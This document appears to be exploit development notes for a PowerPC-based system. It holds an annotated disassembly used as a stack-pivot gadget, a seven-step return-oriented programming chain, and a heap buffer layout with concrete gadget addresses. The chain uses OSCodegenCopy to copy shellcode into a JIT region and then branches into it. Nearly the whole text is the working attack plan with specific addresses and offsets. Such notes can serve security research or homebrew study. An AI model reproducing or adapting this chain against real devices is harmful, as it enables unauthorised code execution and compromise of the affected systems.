RAM:0EA1213C                 lwz       r30, 0(r3)
RAM:0EA12140                 lwz       r0, 0x54C(r30)	# 1. Pivot the stack into the heap (at 0x0E3C6958)
RAM:0EA12144                 mtctr     r0		     The value at 4(r3) is loaded into r1
RAM:0EA12148                 mr        r31, r3		     I assume this value will be our vtable
RAM:0EA1214C                 bctrl
RAM:0EA12150                 lwz       r0, 0x50C(r30)	# 2. Return into the stack (at the epilogue of any function, specifically 0x0E0F3548)
RAM:0EA12154                 mr        r29, r3		     This will begin executing the payload in the vtable
RAM:0EA12158                 mtctr     r0		     Upon executing this gadget, r1 is incremented by 8 bytes
RAM:0EA1215C                 mr        r3, r31
RAM:0EA12160                 bctrl
RAM:0EA12164                 lwz       r30, 0(r31)	
RAM:0EA12168                 lwz       r11, 0x53C(r30)	# 3. Call OSCodegenCopy()
RAM:0EA1216C                 add       r28, r29, r3	     First parameter is in r31, next two are in r4 and r5
RAM:0EA12170                 mtctr     r11
RAM:0EA12174                 mr        r3, r31
RAM:0EA12178                 bctrl
RAM:0EA1217C                 lwz       r0, 0x4FC(r30)	# 4. Return into the stack again (at 0x0E0F3548)
RAM:0EA12180		     mr        r30, r3
RAM:0EA12184                 mtctr     r0
RAM:0EA12188                 mr        r3, r31
RAM:0EA1218C                 bctrl

Stack Execution
-----------------------------------------------------------------
1. Load buffer_address into r30 and (buffer_address + 4) into r31, both off the stack (at 0x0E0F55C8)
2. Call OSGetCodegenVirtAddrRange(), but in the middle (at 0x0103249C)
3. Load r3 into r31, then jump back into our ROP chain (at 0x0F0B5EB0)
4. Load the address of our shellcode into r4, off the stack (at 0x0E0F498C)
5. Load the length of our shellcode into r5, like 0x400, off the stack (at 0x0E10606C)
6. Call OSCodegenCopy() indirectly (at 0x0EA12168)
7. Move r3 to CTR and branch there to begin executing our shellcode (at 0x0E0F347C)

Heap Buffer Layout						Value
-------------------------------------------------------------------------------------
0x00  - Address of the JIT area (set by ROP chain)
0x04  - Length of the JIT area (set by ROP chain)
0x0C  - ROP gadget #1 (at the start, r1 is at offset 0x08)	0x0E0F55C8

0x10  - Buffer address
0x14  - Buffer address + 4
0x1C  - ROP gadget #2 (at the start, r1 is at offset 0x18)	0x0103249C

0x20  - Buffer address
0x24  - Buffer address + 4
0x2C  - ROP gadget #3 (at the start, r1 is at offset 0x28)	0x0F0B5EB0

0x34  - ROP gadget #4 (at the start, r1 is at offset 0x30)	0x0E0F498C
0x38  - Buffer address + 4
0x3C  - Shellcode address

0x5C  - ROP gadget #5 (at the start, r1 is at offset 0x58)	0x0E10606C
0x60  - 0							0
0x68  - Shellcode length					0x400

0x154 - ROP gadget #6 (at the start, r1 is at offset 0x150)	0x0EA12168

0x15C - ROP gadget #7 (at the start, r1 is at offset 0x158)	0x0E0F347C

0x160 - Shellcode

0x4FC - Function epilogue gadget				0x0E0F3548
0x50C - Function epilogue gadget				0x0E0F3548
0x53C - OSCodegenCopy()						0x01032598
0x54C - Stack pivot gadget					0x0E3C6958
0x5EC - Function epilogue gadget				0x0E0F3548